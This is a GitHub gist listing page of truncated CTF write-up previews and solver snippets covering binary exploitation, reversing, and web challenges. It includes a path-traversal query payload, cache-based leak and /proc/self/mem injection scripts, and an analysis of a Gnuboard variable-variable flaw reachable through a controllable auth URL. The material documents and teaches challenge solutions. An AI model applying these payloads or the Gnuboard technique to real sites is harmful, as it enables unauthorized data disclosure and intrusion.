Skip to content

Instantly share code, notes, and snippets.

View sqrtrev's full-sized avatar
🎯
Focusing

SeungHyun Kim sqrtrev

🎯
Focusing
76 followers · 14 following
View GitHub Profile
@sqrtrev
sqrtrev / mail.py
Created March 29, 2022 07:17
#!/usr/bin/env python3
#Solver by parrot / Chance of success is 50%
from pwn import *
import time
def recvMenu():
p.recvuntil('==================')
p.recvuntil('==================\n')
def createAcc(uname):
@sqrtrev
sqrtrev / res.md
Created March 29, 2022 03:39

(Written by okas832)

Analysis

Encrypt input with wasm binary. By analyzing with breakpoint on call_indirects, it encrypts the input with 5 block/stream cipher in random order.

List of ciphers.

  1. camellia with key [17, 34, 51, 68, 85, 102, 119, 136, 153, 170, 187, 204, 221, 238, 255, 0]
  2. AES-CBC with key [167, 65, 190, 20, 49, 221, 130, 73, 99, 87, 186, 241, 49, 174, 207, 213], iv [201, 25, 40, 200, 79, 198, 27, 232, 93, 121, 207, 131, 253, 149, 193, 133]
  3. Triple DES with key (b"HELPME!\x00", b"THANKS!\x00", [16, 32, 48, 64, 80, 96, 112, 128])
@sqrtrev
sqrtrev / rolling.md
Created March 29, 2022 03:37

(Written by c0m0r1)

Simple android app reversing w/ native library. just reversing the logic and running solver code in arm64-v8a CPU android phone with a given native library can solve it.

#include <fcntl.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <dlfcn.h>
@sqrtrev
sqrtrev / trust code.md
Created March 29, 2022 03:35

(Written by Reinose. I just uploaded this)

Step 1. Leak the server key

First of all, the given program has a vulnerability while getting iv for AES-CBC-128. The size of iv buffer is 16 bytes but a user can send max 32 bytes into the buffer. Since it overwrites saved return address, the overwrite affects the process of exception handling. We fuzzed the partial overwrite of return address and found that changing it into somewhere in the run function leaks the private key (e.g. 0x165a). By doing so, we got the secret key v0nVadznhxnv$nph.

@sqrtrev
sqrtrev / simbox.md
Created March 29, 2022 03:17

(Written by Reinose. I just uploaded this)# simbox

Step 1. Guest program exploit

simbox has obvious vulnerability. It parses http get parameters into the stack without any limitation. Therefore, we can easily trigger stack bof and ROP. Additionally, there are no mitigations such as NX and ASLR. We found that the malloc chunk which contains our input located at 0x245a8.

@sqrtrev
sqrtrev / ipc handler.md
Created March 29, 2022 03:16

(Written by okas832 and Reinose. I just uploaded this)

Step 1. Communicate with server

Need to serialize message with protobuf to send data. But protocol.proto file not given. Serialized descriptor_pb2.FileDescriptorProto is at 0x416700:0x4168B0. Recovered protocol.proto with blackbox analysis because couldn't find related documents.

0A 0E 70 72 6F 74 6F 63 6F 6C 2E 70 72 6F 74 6F                                           filename : "protocol.proto"
@sqrtrev
sqrtrev / memo drive
Created March 29, 2022 03:12
We can make more query variable using `;`. So, We can bypass the filtering.
(they are using parse_qsl for getting query)
Payload:
/view?{MyClienID}=flag;/%2e%2e/=123
@sqrtrev
sqrtrev / title todo.md
Created March 29, 2022 03:09

Using STTF and nginx cache header, we can leak the admin's flag.

#!/usr/bin/env python3
import requests
import random
import time

target = 'http://35.187.204.223'
rfile = open('./a','r') #a has nothing interesting
@sqrtrev
sqrtrev / online library.md
Created March 29, 2022 03:08

We can save the payload in the username or somewhere and then execute it with reading /proc/self/mem Run both of the scripts and the same time. One of them inject payloads and the other one search for it. Since we are reading the memory, some links that the script outputs might expire.

#!/usr/bin/env python3
import requests

# target = 'http://localhost:8002'
target = 'http://35.243.100.112'
# target = 'http://localhost:10100'
@sqrtrev
sqrtrev / gnuboard_hayyimctf2022.md
Created February 12, 2022 20:01

Gnuboard (Author: sqrtrev)

https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L65 를 보게되면, HttpClient 클래스를 이용해서 $authUrl에 통신을 시도한다. 여기서 $authUrl$_REQUEST를 통해서 전달되며 (https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L33) 우리가 컨트롤 가능한 값이다. https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L176를 보면 리퀘스트를 보내고, 실패했을 경우 response body를 $netcancelResultString에 저장한다. 이후, https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L186-L187에서 str_replace를 해주는데 여기서 취약점이 발생하게 된다. PHP의 특성상 $$변수의 형태로 값을 사용할 경우, $변수내용을 참조한 것과 같은 행동을 취하게 된다. 따라서, 첫번째 str_replace에서 $body내용을 참고하게 하고, 두번째 str_replace에서는 우리가 원하는 변수에 접근하게 된다. 여기서, $authToken은 우리가 컨트롤 가능한 값이므로 (https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L31), 해당 변수를 이용하기로 했다. authToken=flag로 주고, HttpClient->body에서 authToken을 리턴한다고 가정하자. str_replace 과정에서 $$Http->body == $authToken이 될 것이다. 즉, `$netca